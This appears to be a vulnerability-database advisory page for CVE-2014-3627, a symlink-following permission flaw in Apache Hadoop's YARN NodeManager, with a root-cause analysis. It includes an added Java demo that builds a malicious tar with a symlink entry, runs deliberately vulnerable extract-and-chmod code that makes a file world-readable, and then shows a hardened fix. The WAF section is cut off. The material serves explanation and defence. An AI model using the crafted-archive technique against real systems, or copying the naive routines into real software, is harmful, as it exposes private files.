
CVE-2014-3627: Improper Link Resolution Before File Access in Apache Hadoop

CVSS Score: 5.0 (CVSS v2)

Basic Information

EPSS Score: 0.82804%
Published: 5/17/2022
Updated: 1/27/2023
KEV Status: No
Technology: Java

Technical Details

CVSS Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Package Name                    | Ecosystem | Vulnerable Versions | First Patched Version
org.apache.hadoop:hadoop-client | maven     | >= 0.23.0, < 1.0.1  | 1.0.1
org.apache.hadoop:hadoop-client | maven     | >= 2.0.0, < 2.5.2   | 2.5.2

The ranges above are the Maven package mapping; the CVE text itself describes the affected releases as Hadoop 0.23.0 through 0.23.11 and 2.x before 2.5.2, so check the release line you actually run rather than relying on the artifact range alone.

Vulnerability Intelligence

Miggo AI Root Cause Analysis

The vulnerability has two phases: 1) a tar archive is extracted without rejecting symlink entries, so an attacker-supplied archive can plant a symlink that points at a file outside the extraction directory; 2) a permission-fixing pass then chmods the extracted entries and follows that symlink, so the mode change lands on the link target rather than on the link itself. FileUtil.unTar is responsible for the first phase: it processes archive entries without symlink validation. LocalizedResource.fixPermissions handles the second phase: it applies permissions without a no-follow (NOFOLLOW) check, so a symlink planted in phase 1 is resolved to its target. Both functions would appear in stack traces during exploitation, unTar while processing the malicious archive and fixPermissions while modifying the permissions of the symlink target. Note that Linux has no lchmod(2), so a permission pass cannot simply be told not to follow links; the reliable fix is to refuse link entries at extraction time and, defensively, to skip anything lstat reports as a symlink before calling chmod.
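To make the two phases concrete, here is an added Java example written for this page (it is not Hadoop's FileUtil or LocalizedResource code). It builds an attacker-controlled tar in memory containing a symlink entry, runs a naive extract-then-chmod sequence against it, and then runs a hardened sequence that refuses the archive. It assumes Apache Commons Compress on the classpath and a POSIX host; the method names buildMaliciousTar, unTarNaive, fixPermissionsNaive, unTarHardened and fixPermissionsHardened are hypothetical. The hardened extractor also rejects hard-link entries and `..` path escapes, which goes slightly beyond the symlink case the analysis describes.

```java
import java.io.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;
import java.nio.file.attribute.PosixFilePermission;
import java.nio.file.attribute.PosixFilePermissions;
import java.util.Set;
import org.apache.commons.compress.archivers.tar.*;

/**
 * Added example reproducing the extract-then-chmod symlink bug (not Hadoop code).
 * Assumes Apache Commons Compress on the classpath and a POSIX filesystem.
 * All method names here are hypothetical.
 */
public class SymlinkChmodDemo {

    // "Fix permissions" target mode: world-readable, as in the CVE description.
    private static final Set<PosixFilePermission> WORLD_READABLE =
            PosixFilePermissions.fromString("rw-r--r--");

    /** Constructed attacker archive: symlink "leak" -> target, plus one benign file. */
    static byte[] buildMaliciousTar(Path target) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (TarArchiveOutputStream tar = new TarArchiveOutputStream(bos)) {
            TarArchiveEntry link = new TarArchiveEntry("leak", TarConstants.LF_SYMLINK);
            link.setLinkName(target.toString());
            tar.putArchiveEntry(link);
            tar.closeArchiveEntry();
            byte[] body = "benign content\n".getBytes(StandardCharsets.UTF_8);
            TarArchiveEntry file = new TarArchiveEntry("readme.txt");
            file.setSize(body.length);
            tar.putArchiveEntry(file);
            tar.write(body);
            tar.closeArchiveEntry();
        }
        return bos.toByteArray();
    }

    /** Phase 1 as described above: every entry is materialised, symlinks included. */
    static void unTarNaive(byte[] archive, Path dest) throws IOException {
        try (TarArchiveInputStream in = new TarArchiveInputStream(new ByteArrayInputStream(archive))) {
            for (TarArchiveEntry e = in.getNextTarEntry(); e != null; e = in.getNextTarEntry()) {
                Path out = dest.resolve(e.getName());
                if (e.isSymbolicLink()) {
                    Files.createSymbolicLink(out, Paths.get(e.getLinkName()));
                } else {
                    writeEntry(in, e, out);
                }
            }
        }
    }

    /** Phase 2 as described above: chmod resolves the link, so the target's mode changes. */
    static void fixPermissionsNaive(Path dir) throws IOException {
        try (DirectoryStream<Path> ds = Files.newDirectoryStream(dir)) {
            for (Path p : ds) {
                Files.setPosixFilePermissions(p, WORLD_READABLE); // follows symlinks
            }
        }
    }

    /** Hardened phase 1: reject symlink and hard-link entries and any path escaping dest. */
    static void unTarHardened(byte[] archive, Path dest) throws IOException {
        Path root = dest.toRealPath();
        try (TarArchiveInputStream in = new TarArchiveInputStream(new ByteArrayInputStream(archive))) {
            for (TarArchiveEntry e = in.getNextTarEntry(); e != null; e = in.getNextTarEntry()) {
                if (e.isSymbolicLink() || e.isLink()) {
                    throw new IOException("rejected link entry: " + e.getName());
                }
                Path out = root.resolve(e.getName()).normalize();
                if (!out.startsWith(root)) {
                    throw new IOException("rejected path escape: " + e.getName());
                }
                writeEntry(in, e, out);
            }
        }
    }

    /** Hardened phase 2: lstat first and never chmod through a link (Linux has no lchmod). */
    static void fixPermissionsHardened(Path dir) throws IOException {
        try (DirectoryStream<Path> ds = Files.newDirectoryStream(dir)) {
            for (Path p : ds) {
                if (Files.isSymbolicLink(p)) {
                    continue; // TOCTOU window remains; rejecting links at extraction is the real fix
                }
                Files.setPosixFilePermissions(p, WORLD_READABLE);
            }
        }
    }

    private static void writeEntry(TarArchiveInputStream in, TarArchiveEntry e, Path out) throws IOException {
        if (e.isDirectory()) {
            Files.createDirectories(out);
        } else {
            Files.createDirectories(out.getParent());
            Files.copy(in, out, StandardCopyOption.REPLACE_EXISTING); // reads to end of this entry only
        }
    }

    public static void main(String[] args) throws IOException {
        Path secret = Files.createTempFile("secret", ".txt"); // stands in for a file the attacker cannot read
        Files.setPosixFilePermissions(secret, PosixFilePermissions.fromString("rw-------"));
        byte[] archive = buildMaliciousTar(secret);

        Path naiveDir = Files.createTempDirectory("naive");
        unTarNaive(archive, naiveDir);
        fixPermissionsNaive(naiveDir);
        System.out.println("after naive localization, secret is "
                + PosixFilePermissions.toString(Files.getPosixFilePermissions(secret)));

        Files.setPosixFilePermissions(secret, PosixFilePermissions.fromString("rw-------"));
        Path safeDir = Files.createTempDirectory("hardened");
        try {
            unTarHardened(archive, safeDir);
        } catch (IOException ex) {
            System.out.println("hardened extraction: " + ex.getMessage());
        }
        fixPermissionsHardened(safeDir);
        System.out.println("after hardened localization, secret is "
                + PosixFilePermissions.toString(Files.getPosixFilePermissions(secret)));
    }
}
```

Compile and run with the commons-compress jar on the classpath. The naive path reports the secret file as rw-r--r-- afterwards: the symlink "leak" was created in the extraction directory and the chmod in fixPermissionsNaive went through it to the target, which is exactly the world-readable outcome the CVE describes. The hardened path throws on the link entry, extracts nothing, and leaves the secret at rw-------. The isSymbolicLink check in fixPermissionsHardened is defence in depth only, since a link could be swapped in between the lstat and the chmod; refusing link entries at extraction time is what actually closes the hole.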


WAF Protection Rules

WAF Rule

The YARN NodeManager daemon in Apache Hadoop 0.23.0 through 0.23.11 and 2.x before 2.5.2, when using Kerberos authentication, allows remote cluster users to change the permissions of certain files to world-readable via a symlink attack in a public ta
